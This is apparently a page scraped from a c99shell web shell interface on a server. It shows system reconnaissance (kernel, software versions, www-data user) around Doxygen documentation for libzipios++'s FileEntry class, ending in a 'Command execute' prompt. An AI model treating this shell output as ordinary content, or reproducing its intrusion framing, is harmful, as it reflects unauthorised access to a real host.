Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/libzipios++-doc/html/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
fileentry.h virtual uint32 getCrc() const =0 Returns the Crc for the entry, if it has one. StorageMethod The types used with FileEntry::setMethod and FileEntry::getMethod. Definition: fileentry.h:25 virtual bool isDirectory() const =0 Returns true if the entry is a directory. virtual void setCompressedSize(uint32 size)=0 Set the compressed size field of the entry. virtual uint32 getCompressedSize() const =0 Returns the compressed size of the entry. virtual bool isValid() const =0 Any method or operator that initializes a FileEntry may set a flag, that specifies whether the read e... virtual void setExtra(const vector< unsigned char > &extra)=0 Sets the extra field. Function object to be used with the STL find_if algorithm to find a FileEntry in a container,... Definition: fileentry.h:195 virtual FileEntry * clone() const =0 Create a heap allocated clone of the object this method is called for. virtual string getComment() const =0 Returns the comment of the entry, if it has one. Function object to be used with the STL find_if algorithm to find a FileEntry in a container,... Definition: fileentry.h:181 virtual string getFileName() const =0 Returns the filename of the entry. vector< EntryPointer > ConstEntries ConstEntries is a vector of ConstEntryPointer's. Definition: fileentry.h:43 virtual StorageMethod getMethod() const =0 Returns the method used to store the entry in the FileCollection. virtual string getName() const =0 Returns the full filename of the entry, including a path if the entry is stored in a subfolder. virtual void setComment(const string &comment)=0 Sets the comment field for the FileEntry. virtual string toString() const =0 Returns a human-readable string representation of the entry. virtual void setName(const string &name)=0 Sets the name field for the entry. virtual uint32 getSize() const =0 Returns the (uncompressed) size of the entry data. virtual vector< unsigned char > getExtra() const =0 Returns a vector of bytes of extra data that may be stored with the entry. SimpleSmartPointer is a simple reference counting smart pointer template. Definition: simplesmartptr.h:15 virtual void setMethod(StorageMethod method)=0 Sets the storage method field for the entry. Generated by
1.8.17
|
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]-- |